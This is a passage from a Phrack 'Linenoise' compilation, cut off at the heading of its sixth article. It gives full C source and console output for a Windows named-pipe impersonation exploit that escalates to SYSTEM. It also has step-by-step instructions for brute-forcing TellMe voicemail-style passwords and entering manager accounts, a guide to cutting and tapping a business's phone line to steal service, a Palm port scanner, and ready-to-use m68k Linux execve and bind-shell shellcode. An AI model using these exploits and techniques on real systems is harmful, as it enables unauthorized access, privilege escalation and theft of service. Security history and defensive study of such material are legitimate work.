==Phrack Inc.== Volume 0x0b, Issue 0x3d, Phile #0x03 of 0x0f |=---------------------=[ L I N E N O I S E ]=---------------------------=| |=-----------------------------------------------------------------------=| |=------------------------=[ Phrack Staff ]=-----------------------------=| Everything that does not fit somewhere else can be found here. Corrections and additions to previous articles, to short articles or articles that just dont make it....everything. Contents 1 - Windows named pipes exploitation by DigitalScream 2 - How to hack into TellMe by Archangel 3 - Shitboxing by Agent5 4 - PalmMap v1.6 - Nmap for Palm by Shaun Colley 5 - Writing Linux/mc68xxx shellcode by madcr 6 - Finding hidden kernel modules (the extrem way) by madsys 7 - Good old floppy bombs by Phrick |=-----------------------------------------------------------------------=| |=-=[ 1 - Windows named pipes exploitation ]=----------------------------=| |=-----------------------------------------------------------------------=| by DigitalScream / SecurityLevel5 All latest versions of Microsoft Windows family operation systems are based on Windows NT kernel. This fact has positive impact for both remote and local security of Windows world. There are still some thin places though allowing obtaining Local System privileges on the local computer leading to the full system compromise. Usually this is because different buffer overruns in stack or heap in system services, like in case of any operation system. However we should not forget about system specific bugs because of abnormal behavior of system functions. This kind of bugs is very system dependant and from time to time is discovered in different OS. Of cause, Windows is not exception. Specific bugs are usually having impact on local users. Of cause, this is not a kind of axiom, but local user has access to larger amount of the system API functions comparing with remote one. So, we are talking about possibility for local user to escalate his privileges. By privilege escalation we mean obtaining privileges of Local System to have no limitations at all. Now there are few ways to get it, I will talk about new one. According to MSDN to launch application with different account one must use LogonUser() and CreateProcessAsUser() functions. LogonUser() requires username and password for account we need. 'LogonUser()' task is to set SE_ASSIGNPRIMARYTOKEN_NAME and SE_INCREASE_QUOTA_NAME privileges for access token. This privileges are required for CreateProcessAsUser(). Only system processes have these privileges. Actually 'Administrator' account have no enough right for CreateProcessAsUser(). So, to execute some application, e.g. 'cmd.exe' with LocalSystem account we must have it already. Since we do not have username and password of privileged user we need another solution. In this paper we will obtain 'LocalSystem' privileges with file access API. To open file Windows application call CreateFile() function, defined below: HANDLE CreateFile( LPCTSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile ); To open file we must call something like HANDLE hFile; hFile=CreateFile(szFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); For advanced Windows programmer it's clear that this function has more application rather than only opening ordinary files. It's used to openor create new files, directories, physical drives, and different resources for interprocess communication, such as pipes and mailslots. We will be concerned with pipes. Pipes are used for one-way data exchange between parent and child or between two child processes. All read/write operations are close to thesame file operations. Named Pipes are used for two-way data exchange between client and server or between two client processes. Like pipes they are like files, but can be used to exchange data on the network. Named pipe creation example shown below: HANDLE hPipe = 0; hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE|PIPE_WAIT, 2, 0, 0, 0, NULL); |=----------------------------------------------------------------------=| Named pipe's name can vary, but it always has predefined format. The example of valid name is '\\.\pipe\GetSys'. For Windows, '\\.\' sequence always precedes filename, e.g. if "C:\boot.ini" is requested system actually accesses '\\.\C:\boot.ini'. This format is compatible with UNC standard. With basic knowledge of named pipes operations we can suppose there can be a way to full application to access named pipe instead of user supplied file. For example, if we created named pipe "\\.\pipe\GetSys" we can try to force application to access "\\ComputerName\pipe\GetSys". It gives us a chance to manipulate with access token. Impersonation token is access token with client's privileges. That is, this is possibility for server to do something on client's behalf. In our case server is named pipe we created. And it becomes possible because we are granted SecurityImpersonation privilege for client. More precisely, we can get this privilege. If client application has privileges of local system we can get access to registry, process and memory management and another possibilities not available to ordinary user. This attack can be easily realized in practice. Attack scenario for this vulnerability is next: 1. Create name pipe Wait client connect after named pipe is created. 2. Impersonate client Because we assume client application has system rights we will have them too. 3. Obtain required rights. In fact, we need only - SE_ASSIGNPRIMARYTOKEN_NAME - SE_INCREASE_QUOTA_NAME - TOKEN_ALL_ACCESS - TOKEN_DUBLICATE This is all we need for CreateProcessAsUser() function. To obtain rights we need new token with TOKEN_ALL_ACCESS privelege. And we can do it, because we have privileges of client process. Execute code of our choice It could be registry access, setting some hooks or random commands with system privileges. Last one is most interesting, because we can execute standalone application of our choice for our specific needs. As it was said before, now I can execute CreateProcessAsUser() with system privileges. I back to beginning, but this time I have all required privileges and 'LocalSystem' is under my thumb. There is no problem to realize this approach. As an example, we will use working exploit by wirepair at sh0dan.org based on the code of maceo at dogmile.com. #include #include int main(int argc, char **argv) { char szPipe[64]; DWORD dwNumber = 0; DWORD dwType = REG_DWORD; DWORD dwSize = sizeof(DWORD); DWORD dw = GetLastError(); HANDLE hToken, hToken2; PGENERIC_MAPPING pGeneric; SECURITY_ATTRIBUTES sa; DWORD dwAccessDesired; PACL pACL = NULL; PSECURITY_DESCRIPTOR pSD = NULL; STARTUPINFO si; PROCESS_INFORMATION pi; if (argc != 2) { fprintf(stderr, "Usage: %s \n", argv[0]); return 1; } memset(&si,0,sizeof(si)); sprintf(szPipe, "\\\\.\\pipe\\GetSys"); // create named pipe"\\.\pipe\GetSys" HANDLE hPipe = 0; hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE|PIPE_WAIT, 2, 0, 0, 0, NULL); if (hPipe == INVALID_HANDLE_VALUE) { printf ("Failed to create named pipe:\n %s\n", szPipe); return 2; } printf("Created Named Pipe: \\\\.\\pipe\\GetSys\n"); // initialize security descriptor to obtain client application // privileges pSD = (PSECURITY_DESCRIPTOR) LocalAlloc(LPTR,SECURITY_DESCRIPTOR_MIN_LENGTH); InitializeSecurityDescriptor(pSD, SECURITY_DESCRIPTOR_REVISION); SetSecurityDescriptorDacl(pSD,TRUE, pACL, FALSE); sa.nLength = sizeof (SECURITY_ATTRIBUTES); sa.lpSecurityDescriptor = pSD; sa.bInheritHandle = FALSE; printf("Waiting for connection...\n"); // wait for client connect ConnectNamedPipe (hPipe, NULL); printf("Impersonate...\n"); // impersonate client if (!ImpersonateNamedPipeClient (hPipe)) { printf ("Failed to impersonate the named pipe.\n"); CloseHandle(hPipe); return 3; } printf("Open Thread Token...\n"); // obtain maximum rights with TOKEN_ALL_ACCESS if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &hToken )) { if (hToken != INVALID_HANDLE_VALUE) { printf("GetLastError: %u\n", dw); CloseHandle(hToken); return 4; } } printf("Duplicating Token...\n"); // obtain TOKEN_DUBLICATE privilege if(DuplicateTokenEx(hToken,MAXIMUM_ALLOWED, &sa,SecurityImpersonation, TokenPrimary, &hToken2) == 0) { printf("error in duplicate token\n"); printf("GetLastError: %u\n", dw); return 5; } // fill pGeneric structure pGeneric = new GENERIC_MAPPING; pGeneric->GenericRead=FILE_GENERIC_READ; pGeneric->GenericWrite=FILE_GENERIC_WRITE; pGeneric->GenericExecute=FILE_GENERIC_EXECUTE; pGeneric->GenericAll=FILE_ALL_ACCESS; MapGenericMask( &dwAccessDesired, pGeneric ); dwSize = 256; char szUser[256]; GetUserName(szUser, &dwSize); printf ("Impersonating: %s\n", szUser); ZeroMemory( &si, sizeof(STARTUPINFO)); si.cb = sizeof(si); si.lpDesktop = NULL; si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_SHOW; printf("Creating New Process %s\n", argv[1]); // create new process as user if(!CreateProcessAsUser(hToken2,NULL, argv[1], &sa, &sa,true, NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE,NULL,NULL,&si, &pi)) { printf("GetLastError: %d\n", GetLastError()); } // wait process to complete and exit WaitForSingleObject(pi.hProcess,INFINITE); CloseHandle(hPipe); return 0; } This vulnerability gives a chance for us to obtain system privileges on local computer. The only condition is system process must access this channel. This condition is easy to reproduce with system services. For example: [shell 1] >pipe cmd.exe Created Named Pipe: \\.\pipe\GetSys Waiting for connection... [shell 2] >time /T 18:15 >at 18:16 /interactive \\ComputerName\pipe\GetSys New task added with code 1 [shell 1] Impersonate... Open Thread Token... Duplicating Token... Impersonating: SYSTEM Creating New Process cmd.exe Now we have new instance of cmd.exe with system privileges. It means user can easily obtain privileges of local system. Of cause reproduce this situation is easy only in case, there is a service, which can access files on user request. Because 'at' command requires at least power user privileges and may be used to launch cmd.exe directly, without any named pipe this example is useless. In practice, this vulnerability may be exploited for privilege escalation by the local user if Microsoft SQL Server is installed. SQL server runs with system privileges and may be accessed with unprivileged user. @Stake reported vulnerability in xp_fileexist command. This command checks for file existence and we can use it to access our named pipe. Attack scenario is nearly same: [shell 1] >pipe cmd.exe Created Named Pipe: \\.\pipe\GetSys Waiting for connection... [shell 2] C:\>isql -U user Password: 1> xp_fileexist '\\ComputerName\pipe\GetSys' 2> go File Exists File is a Directory Parent Directory Exists ----------- ------------------- ----------------------- 1 0 1 [shell 1] Impersonate... Open Thread Token... Duplicating Token... Impersonating: SYSTEM Creating New Process cmd.exe At the end, it's good to point that this vulnerability exists in Windows NT/2000/XP and is patched with Windows 2000 SP4 and on Windows 2003. A big thank to ZARAZA(www.security.nnov.ru), without him, nothing could be possible. [1] Overview of the "Impersonate a Client After Authentication" http://support.microsoft.com/default.aspx?scid=kb;[LN];821546 [2] Exploit by maceo http://www.securityfocus.com/archive/1/74523 [3] Exploit by wirepair http://www.securityfocus.com/archive/1/329197 [4] Named Pipe Filename Local Privilege Escalation www.atstake.com/research/advisories/2003/a070803-1.txt [5] Service Pack 4 for Windows 2000 http://download.microsoft.com/download/b/1/a/ b1a2a4df-cc8e-454b-ad9f-378143d77aeb/SP4express_EN.exe |=-----------------------------------------------------------------------=| |=-=[ 2 - How to hack into Tellme ]=-------------------------------------=| |=-----------------------------------------------------------------------=| How to get into the Tell-Me network. (1-800-555-tell) This is a representation of someone's thoughts. Thoughts cannot be owned by another person. Use this thought as you see fit, it is yours to duplicate or use as you please. By Archangel (Formerly of the P.H.I.R.M.) Archangel Systems http://the.feds.are.lookingat.us -------------------------------------- What is the Tell-Me system? =========================== TellMe is a high-tech voice activated phone site with internet connectivity, and even a voice activated browser. It is the ultimate goal of TellMe to have the whole of the internet voice activated. The system is quite sophisticated by today's standards, though I'm sure that tomorrow's readers will find the efforts to be quite primative to say the least. A free phone call gives the listener access to news, sports, weather, etc. Even movie listings. Other areas provide for private announcements, or even voice activated web-sites. In other words, it is now possible, through TellMe, to dial a phone number, and listen to a website. Tell me is a subsidiary of CNET, a giant (at the time of this writing) on the internet. What security flaws were exploited? =================================== Well, I guess it's nut-cutting time. TellMe has a VERY SERIOUS security flaw which can allow unauthorized access to the system within a matter of hours. As I tried to hack into my own account, I realized that TellMenu announcements only have a 4 digit numeric password. Here's what you do: - You dial 1-800-555-tell. - You will get an automated banner-ad followed by a menu discribing various TellMe features. - You must say the word "Announcements", or dial "198" on the keypad. This will take you to the announcements area. - Once in the announcements area, you will need to punch in the announcement number, which is a seven digit number assigned to you by the TellMe computer. - Type in any announcement number you wish (I tried with my own one first, as this was an experiment to see if I could hack in and change my own announcement). The computer says "Ok, here is your announcement." Then I heard a recording of The Baron Telling what a whimp I am. - This was followed by the computer saying: Please type in another announcement number, or say "Main Menu" to continue. If you are the announcement manager, please use you telephone keypad to enter your password to edit the announcement. If you remain silent, the computer will say: "Please enter your 4 digit password." FOUR DIGITS????? Were they serious? Now here's the kicker: TELLME WON'T DISCONNECT YOU IF YOU FAIL 3 TIMES IN A ROW!!! Yes, ladies and gentlement, keep trying to your heart's content. No penalties. Obviously a Brute Force hack was in order. I handled it by dusting off a *VERY* old wardialer. I sat on an extention line, due to the limitations of the dialer, and listened to it punching in access codes. When it succeeded, I could pause the wardialer program. I would be able to look at the screen, and see what the last couple of attempted numbers were, manually dial them in, and gain access. I know there are easier methods, but this is what I did. The Baron had mercifully chosen a low number, and I was in, changing the message in about ten minutes. I then tried two other *SAFE* messages, that I would not get in trouble for, if changed. I gained access, respectively, in 45 and 90 minutes (More or less). My math told me that the maximum time to Brute Force a TellMe announcement was about three hours. Is that it? No, while having the ability to change any announcement may be a lot of fun, there is a far more intersting hack that you can do on TellMe. Remember how when you first sign on, you have to say "announcements"? Try saying the word "Extensions". You may be quite surprised at what you find. What are Tell-Me extensions? ============================ Tell-Me extensions are that part of the Tellme network, which they have offered to the world to produce the voice activated web pages. Here is what you do. - Say "Extensions". You will be taken to the extensions area, and asked to punch in an extension number. This is a five digit number. It was time again for my ancient wardialer to do it's stuff. (Once again, no penalty for incorrect guesses!) First off, it is important at this point to mention that TellMe is a dying concern. Most of the extensions are empty. The only extensions still operating, are some extensions created by individual developers, Die-hard developers, and (This is important later) TellMe's *own* extensions. Apparently, the idea was to use the extension number as a kind of password, as there is no directory, and one must already know the extension number in order to gain access. I checked into The San Remo hotel here in Las Vegas, under my girlfriend's name, and spent the night hacking. Here's what I have come up with so far: Extension 76255: ---------------- This leads to a very bizarre game of Rock/Paper/Scissors. It is one of the wierdest things that I have ever come across in all my days. I HIGHLY suggest you try it. It is like some whiney hillbilly guy...well see fer yerself! Extension 11111: ---------------- A gypsy with an eight ball. You ask it questions, and it gives you answers. There are no disclaimers, so I guess this is the real deal! Saying "quit" or "Stop" won't help you. Just shut the hell up, and it will kick you back into regular Tell-Me. Extension 33333: ---------------- Produces the words "HELLO WORLD" Extension 34118: ---------------- Produces a directory of TellMe's offices, with the regular phone numbers. Most of the worthy extensions consisted of foul language, so anyone under 18 should stop reading now... Use the letters on your telephone keypad, and you will get some very intersting results. These are five letter words corresponding to the numbers on your phone. CUNTS - Produces a string of numbers of unknown meaning. Just a long string of a computer voice saying "one, five, seven, three, twelve, eighty-eight" etc. I'll figure out what that means later. TITTY - This produces a fax tone, as opposed to a computer tone. I didn't mess with it. PENIS - This produces a verbal message about the sendmail system. HOLES - This is the Quote of the Day. BOOBS - This has to do with HTTP protocols. SHIT0 - This is a directory of phone lines in the TellMe system. FUCK0 - This is a very interesting directory of phone lines in the TellMe system. Two of the lines appear to be trusted lines, providing a computer tone which I used to log on. There was a first time user option, which gave me a manager's account. (Do they have hundreds of managers?) What can it do? I was able to delete my own account and bring it back. I didn't fuck with anyone elses account. My goal is not to destroy, but to learn. PISS0 - As above, the TellMe system addresses me with a choice of talking to a live person, or an automated directory of phone lines. I'm amazed this is all behind a five digit password. Damn0 - Yet another directory of trusted phone lines. This one, however askes you for another password right up front, so I'm assuming this is a more security sensative area! Pussy - A discription of how to configure a TellMe webpage. Cum69 - Advice on proper password generation. (hahahahahahahahahaha!!!!) EATME - Computer tone leading to nowhere. The TellMe security protocols are pathetic. Archangel (The Teflon Con) Wrath of God Hand Delivered http://the.feds.are.lookingat.us |=-----------------------------------------------------------------------=| |=-=[ 3 - Shitboxing ]=--------------------------------------------------=| |=-----------------------------------------------------------------------=| by Agent5 So you're sitting in a small family owned type resturaunt or you're walking through a small store looking at their various wares and, as normal every couple times a day, you hear the call of nature. You make your way towards the (preferably single occupancy) mens room (or ladies for those few that may actually read this) and enter. So your doing your thing and you're lookin around checking out your surroundings (why? cause you're supposed to be fucking observant at all times.Thats why.) Your gaze takes you towards the ceiling. Looks like most most cheap drop down ceilings. hmmmm.... drop down ceiling.....easily removable. So you stand on the toilet, or whatever, and take a look. You pull out your pocket flashlight and take a look. Nothing but wires. Couple elecrical or telephone maybe... ..TELEPHONE? Does this mean i can sit on the throne and use the fone? Indeed it does! All you need is a few things to help you make your dream of phreaking at its absolute lazyest a reality.what you need will (besides your beigebox with a RJ-11 plug on the cord) probably cost you, at an extreme maximum, 3 bucks for parts and about 6 bucks for an telephone Line Crimper for standard telephone plugs (RJ-11) you will also need a... "modular line splitter - Provides two telephone jacks when plugged into the end of a telephone line cord. Standard 4-wire jacks. Color: Ivory"----bout dollar and change max cost. Most of these parts, if not all, can be found at your local radioshack. Now if you havent figured out what i'm getting at yet, you should seek medical attention immediately, CAT-scans have helped me alot. Heres what you do and make sure you do it quickly in case they try to use the telephone while the line is disconnected. SO make sure you lock the door and get to work fast....if you have people beginning to knock on the door just make some nasty shitting sounds and say you'll be out in a minute. 1. Cut the line. (no specific tools needed, something sharp will do) 2. Attach a plug to either end of the line you have just cut. 3. Put one end of the plug in one end of the modular line splitter, put the one thats left into one of the two holes on the front of the splitter. 4. Now you can either leave and let the intestinaly distressed old guy pouding on the door in, or you can plug your beige box in and have some fun. Treat this as you would any other beige boxing session. Keep in mind that the people who own the telephone line may want to use it to and may not enjoy having someone on the line already. But for the most part this ordinary bathroom has just become a your private telephone booth, complete with running water and a toilet for the astronomical sum of 3 dollars US. "This file brought to you by the makers of sharp things." Shoutouts to Epiphany, Bizurke, Master Slate, Ic0n, Xenocide, Bagel, Hopping Goblin, Maddjimbeam, lioid, emerica, the rest of the #mabell ninja's, port7 alliance, and LPH crew . |=-----------------------------------------------------------------------=| |=-=[ 4 - PalmMap v1.6 - Nmap for Palm ]=--------------------------------=| |=-----------------------------------------------------------------------=| (submitted by Shaun Colley ) -----BEGIN PALMMAP----- # PalmMap.bas # PalmMap v1.6 - Nmap for Palm. fn set_auto_off(0) s$(0) = "Host:" s$(2) = "Start Port:" s$(4) = "End Port:" f = form(9, 3, "PalmMap v1.6") if f = 0 then end if f = 2 then gosub about let h$ = s$(1) let p = val(s$(3)) let e = val(s$(5)) let i = p let t$ = "PalmMap.log" open new "memo", t$ as #4 form2: cls form btn 30 , 40 , 40 , 18, "connect()", 1 form btn 85 , 40, 40 , 18 , "TCP SYN" , 1 form btn 60 , 80 , 40 , 18 , "UDP scan" , 1 form btn 60 , 120, 40 , 18 , "TCP FIN " , 1 draw "Scan type?", 50, 20, 1 while x = asc(input$(1)) if x = 14 then gosub scan if x = 15 then print "Scan type not implemented as of yet." if x = 16 then print "Scan type not implemented as of yet." if x = 17 then print "Scan type not implemented as of yet." wend sub scan cls print at 50, 40 while(i <= e) c = fn tcp(1, h$, i) if(c = 0) print "Port ", i, "Open" fn tcp(-1, "", 0) print #4, "Port ", i, "Open" else fn tcp(-1, "", 0) print #4, "Port ", i, "Closed" endif let i = i + 1 wend close #4 print "Scan complete!" end sub about cls msgbox("PalmMap - Nmap for Palm.", "About PalmMap 1.6") -----END PALMMAP----- |=-----------------------------------------------------------------------=| |=-=[ 5 - Writing Linux/mc68xxx Shellcodez ]=----------------------------=| |=-----------------------------------------------------------------------=| by madcr (madrats@mail.ru) I Introdaction. II Registers. III Syscalls. IV Execve shellcode. V Bind-socket shellcode. VI References. I. Introdaction. The history Motorola begins already with 1920 then they let out radioelements and about computers of nothing it was known. Only in 1974, motorola lets out the first 8th the bit microprocessor - MC6800, containing 4000 transistors and in 1979 motorola announces the first 16th bit processor - MC68000, capable to process up to 2 million operations per one second. After 5 more years, in 1984 motorola relize the first 32th the bit processor (MC68020), containing 200000 transistors. Till 1994 inclusive motorola improved a series of the processors and in a result, in March, release MC68060 processor contained 2,5 million transistors. In present days, 68060 is the optimal processor for use any unix. The processor can work in 2 modes: User and SuperVisor. It not analogy of the real and protected mode in x86 processors. It some kind of protection "just in case". In the user mode it is impossible to cause exceptions and it is impossible to have access to all area of memory. In supervisor mode all is accessible. Accordingly kernel work in Supervisor mode, and rest in User mode. MC68 supported various manufacturers unix, such as netbsd, openbsd, redhat linux, debian linux, etc. Given article is focused on linux (in particular debian). II. Registers. The processor as a matter of fact the CISC (but there are some opportunities RISC), accordingly not so is a lot of registers: Eight registers of the data: with %d0 on %d7. Eight registers of the address: with %a0 on %a7. The register of the status: %sr. Two stack indexes: %sp and %fp The program counter: %pc. Basically it is not required to us of anything more. And the minimal set of instructions which is required to us by development shellcode: instruction example description move movl %d0,%d1 Put value from %d0 in %d1 lea leal %sp@(0xc),%a0 calculate the address on 0xc to displacement in the stack and it is put in. %a0. eor eorl %d0,%d1 xor pea pea 0x2f2f7368 push in stack '//sh' In total these 4 instructions will be enough for a spelling functional shellcode ?). And now it is high time to tell about the fifth, most important instruction (fifth, need us i mean) and about exceptions. The instruction trap - a call of exception. In processors motorola, only 256 exceptions, but of all of them are necessary for us only one - trap #0. In mc68 linux on this exception call to a kernel, for execution system call. Trap 0 refers to a vector located to the address $80h (strange concurrence). Now we shall stop on system calls more in detail. III. System Calls. System calls on the given architecture are organized thus: %d0 - number of a system call. %d1,%d2,%d3 - argv i.e. to make banal setuid (0); we will have something unpretentious: eorl %d2,%d2 movl %d2,%d1 movl #23,%d0 trap #0 Rather simple. IV. Execve shellcode. So, we shall start as always with old-kind execve: .globl _start _start: .text movl #11,%d0 /* execve() (see unistd.h) */ movl #m1,%d1 /* /bin/sh address */ movl #m2,%d2 /* NULL */ movl #m2,%d3 /* NULL too */ trap #0 .data m1: .ascii "/bin/sh\0" m2: .ascii "0\0". # as execve.s -o execve.o ; ld execve.o -o execve # ./execve sh-2.03# exit exit # Such code will not go, since he not pozitsio-independent and did not check him on zero. Therefore we shall rewrite him with participation of the stack (since the machine at us big endian the order of following of byte needs to be taken into account): .globl _start _start: moveq #11,%d0 /* execve() */ pea 0x2f2f7368 /* //sh */ pea 0x2f62696e /* /bin (big endian) */ movel %sp,%d1 /* /bin/sh in %d1 */ eorl %d2,%d2 /* pea 0x0 + avoiding */ movel %d2,%sp@- /* zero byte */ pea 0x130 /* pea 0030 -> 0130 = kill the zero */ movel %sp,%d2 /* NULL in %d2 */ movel %d2,%d3 /* NULL in %d2 */ trap #0 /* syscall */ # as execve2.s -o execve2.o ; ld execve2.o -o execve2 # ./execve2 sh-2.03# exit exit # Very well. Now we shall mutate him in ascii and we shall look as it works: char execve_shellcode[]= "\x70\x0b" /* moveq #11,%d0 */ "\x48\x79\x2f\x2f\x73\x68" /* pea 0x2f2f7368 -> //sh */ "\x48\x79\x2f\x62\x69\x6e" /* pea 0x2f62696e -> /bin */ "\x22\x0f" /* movel %sp,%d1 */ "\xb5\x82" /* eorl %d2,%d2 -> */ "\x2f\x02" /* movel %d2,%sp@- -> pea 0x0 */ "\x48\x78\x01\x30" /* pea 0x130 */ "\x24\x0f" /* movel %sp,%d2 */ "\x26\x02" /* movel %d2,%d3 */ "\x4e\x40"; /* trap #0 */ main() { int *ret; ret=(int *)&ret +2; *ret = execve_shellcode; } # gcc execve_shellcode.c -o execve_shellcode # ./execve_shellcode sh-2.03# exit exit # Our shellcode. Perfectly. But certainly it is not enough of it, therefore we shall binding this shellcode on socket. V. Bind-socket shellcode. For the beginning we write our code on C: #include <;;shiti;;> main() { int fd,dupa; struct sockaddr_in se4v; fd=socket(AF_INET,SOCK_STREAM,0); se4v.sin_port=200; se4v.sin_family=2; se4v.sin_addr.s_addr=0; bind(fd,(struct sockaddr *)&se4v,sizeof(se4v)); listen(fd,1); dupa=accept(fd,0,0); dup2(dupa,0); dup2(dupa,1); dup2(dupa,2); execl("/bin/sh","sh",0); } # gcc -static bindshell.c -o bindshell & # ./bindshell & [1] 276 # netstat -an | grep 200 tcp 0 0 0.0.0.0:200 0.0.0.0:* LISTEN # telnet localhost 200 Trying 127.0.01... Connected to localhost. Escape character is '^]'. echo aaaaaaaaaaaa aaaaaaaaaaaa ctrl+c [1]+ Done ./bindshell All works. Now the last, that us interests - it as there is a work with a network. # gdb -q ./bindshell (gdb) disas socket Dump of assembler code for function socket: 0x80004734 : moveal %d2,%a0 0x80004736 : moveq #102,%d0 0x80004738 : moveq #1,%d1 0x8000473a : lea %sp@(4),%a1 0x8000473e : movel %a1,%d2 0x80004740 : trap #0 0x80004742 : movel %a0,%d2 0x80004744 : tstl %d0 0x80004746 : bmil 0x80004958 <__syscall_error> 0x8000474c : rts 0x8000474e : rts End of assembler dump. (gdb) Perfectly. As well as everywhere - 102 = socket_call. 1 - sys_socket. (for the full list look net.h). Proceeding from the aforesaid we shall write it on the assembler: .globl _start _start: /* socket(AF_INET,SOCK_STREAM,0); ----------------------------------------- */ /* af_inet - 2, sock_stream - 1, ip_proto0 - 0 */ moveq #2,%d0 movl %d0,%sp@ /* sock_stream */ moveq #1,%d0 movel %d0,%sp@(0x4) /* AF_INET */ eorl %d0,%d0 movl %d0,%sp@(0x8) movl %sp,%d2 /* put in d2 the address in the stack on where our argv*/ movl #0x66,%d0 /* socketcall (asm/unistd.h) */ movl #1,%d1 /* sys_socket (linux/net.h) */ trap #0 /* go on vector 80 */ /* -bind(socket,(struct sockaddr *)&serv,sizeof(serv));-------------------- */ movl %d0,%sp@ /* in d0 back descriptor on socket */ move #200,%d0 movl %d0,%sp@(0xc) /* port number */ eorl %d0,%d0 movl %d0,%sp@(0x10) /* sin_addr.s_addr=0 */ moveq #2,%d0 movl %d0,%sp@(0x14) /* sin_family=2 */ /* Let's calculate the address of an arrangement of constants of the */ /* second argument and we shall put this address as the second argument */ leal %sp@(0xc),%a0 movl %a0,%sp@(0x4) moveq #0x10,%d0 movl %d0,%sp@(0x8) /* third argument 0x10 */ movl #0x66,%d0 /* socketcall (asm/unistd.h) */ movl #2,%d1 /* sys_bind (linux/net.h) */ trap #0 /* go on vector 80 */ /* listen (socket,1); ----------------------------------------------------- */ /* descriptor socket's already in stack. */ /*------------------------------------------------------------------------- */ moveq #1,%d0 movl %d0,%sp@(4) /* in d2 already put address of the beginning arguments in the stack */ movl #0x66,%d0 /* scoketcall (asm/unistd.h) */ movl #4,%d1 /* sys_listen (linux/net.h) */ trap #0 /* go on vector 80 */ /* accept (fd,0,0); ------------------------------------------------------- */ eorl %d0,%d0 movl %d0,%sp@(4) movl %d0,%sp@(8) movl #0x66,%d0 /* scoketcall (asm/unistd.h) */ movl #5,%d1 /* sys_accept (linux/net.h) */ trap #0 /* go on vector 80 */ /* dup2 (cli,0); ---------------------------------------------------------- */ /* dup2 (cli,1); ---------------------------------------------------------- */ /* dup2 (cli,2); ---------------------------------------------------------- */ movl %d0,%d1 movl #0x3f,%d0 movl #0,%d2 trap #0 movl %d0,%d1 movl #0x3f,%d0 movl #1,%d2 trap #0 movl %d0,%d1 movl #0x3f,%d0 movl #2,%d2 trap #0 /* execve ("/bin/sh"); ----------------------------------------------------- */ movl #11,%d0 /* execve */ pea 0x2f2f7368 /* //sh */ pea 0x2f62696e /* /bin */ movl %sp,%d1 /* /bin/sh in %d1 */ eorl %d2,%d2 movl %d2,%sp@- /* pea 0x0 */ pea 0x0130 /* 0030 -> 0130 = kill the zero */ movl %sp,%d2 movl %d2,%d3 trap #0 /* ---EOF---bindsock shellcode--------------------------------------------- */ # as bindshell.s -o bindshell.o ; ld bindshell.o -o bindshell # ./bindshell & [309] # telnet localhost 200 Trying 127.0.01... Connected to localhost. Escape character is '^]'. echo aaaaaaaaaaaa aaaaaaaaaaaa ctrl+c In general and all. The code certainly super-not optimized, is some zero, but the general picture I hope has given. And at last how it should be: char bind_shellcode[]= "\x70\x02" /* moveq #2,%d0 */ "\x2e\x80" /* movel %d0,%sp@ */ "\x70\x01" /* moveq #1,%d0 */ "\x2f\x40\x00\x04" /* movel %d0,%sp@(4) */ "\xb1\x80" /* eorl %d0,%d0 */ "\x2f\x40\x00\x08" /* movel %d0,%sp@(8) */ "\x24\x0f" /* movel %sp,%d2 */ "\x70\x66" /* moveq #102,%d0 */ "\x72\x01" /* moveq #1,%d1 */ "\x4e\x40" /* trap #0 */ "\x2e\x80" /* movel %d0,%sp@ */ "\x30\x3c\x00\xc8" /* movew #200,%d0 */ "\x2f\x40\x00\x0c" /* movel %d0,%sp@(12) */ "\xb1\x80" /* eorl %d0,%d0 */ "\x2f\x40\x00\x10" /* movel %d0,%sp@(16) */ "\x70\x02" /* moveq #2,%d0 */ "\x2f\x40\x00\x14" /* movel %d0,%sp@(20) */ "\x41\xef\x00\x0c" /* lea %sp@(12),%a0 */ "\x2f\x48\x00\x04" /* movel %a0,%sp@(4) */ "\x70\x10" /* moveq #16,%d0 */ "\x2f\x40\x00\x08" /* movel %d0,%sp@(8) */ "\x70\x66" /* moveq #102,%d0 */ "\x72\x02" /* moveq #2,%d1 */ "\x4e\x40" /* trap #0 */ "\x70\x01" /* moveq #1,%d0 */ "\x2f\x40\x00\x04" /* movel %d0,%sp@(4) */ "\x70\x66" /* moveq #102,%d0 */ "\x72\x04" /* moveq #4,%d1 */ "\x4e\x40" /* trap #0 */ "\xb1\x80" /* eorl %d0,%d0 */ "\x2f\x40\x00\x04" /* movel %d0,%sp@(4) */ "\x2f\x40\x00\x08" /* movel %d0,%sp@(8) */ "\x70\x66" /* moveq #102,%d0 */ "\x72\x05" /* moveq #5,%d1 */ "\x4e\x40" /* trap #0 */ "\x22\x00" /* movel %d0,%d1 */ "\x70\x3f" /* moveq #63,%d0 */ "\x74\x00" /* moveq #0,%d2 */ "\x4e\x40" /* trap #0 */ "\x22\x00" /* movel %d0,%d1 */ "\x70\x3f" /* moveq #63,%d0 */ "\x74\x01" /* moveq #1,%d2 */ "\x4e\x40" /* trap #0 */ "\x22\x00" /* movel %d0,%d1 */ "\x70\x3f" /* moveq #63,%d0 */ "\x74\x02" /* moveq #2,%d2 */ "\x4e\x40" /* trap #0 */ "\x70\x0b" /* moveq #11,%d0 */ "\x48\x79\x2f\x2f\x73\x68" /* pea 2f2f7368 */ "\x48\x79\x2f\x62\x69\x6e" /* pea 2f62696e */ "\x22\x0f" /* movel %sp,%d1 */ "\xb5\x82" /* eorl %d2,%d2 */ "\x2f\x02" /* movel %d2,%sp@- */ "\x48\x78\x01\x30" /* pea 130 */ "\x24\x0f" /* movel %sp,%d2 */ "\x26\x02" /* movel %d2,%d3 */ "\x4e\x40"; /* trap #0 */ main() { int *ret; ret=(int *)&ret +2; *ret = bind_shellcode; } p.s. as always - sorry for my poor english. VI. References. [1] http://e-www.motorola.com/collateral/M68000PRM.pdf - programmer's manual [2] http://e-www.motorola.com/brdata/PDFDB/docs/MC68060UM.pdf - user's manual [3] http://www.lsd-pl.net/documents/asmcodes-1.0.2.pdf - good tutorial |=-----------------------------------------------------------------------=| |=-=[ 6 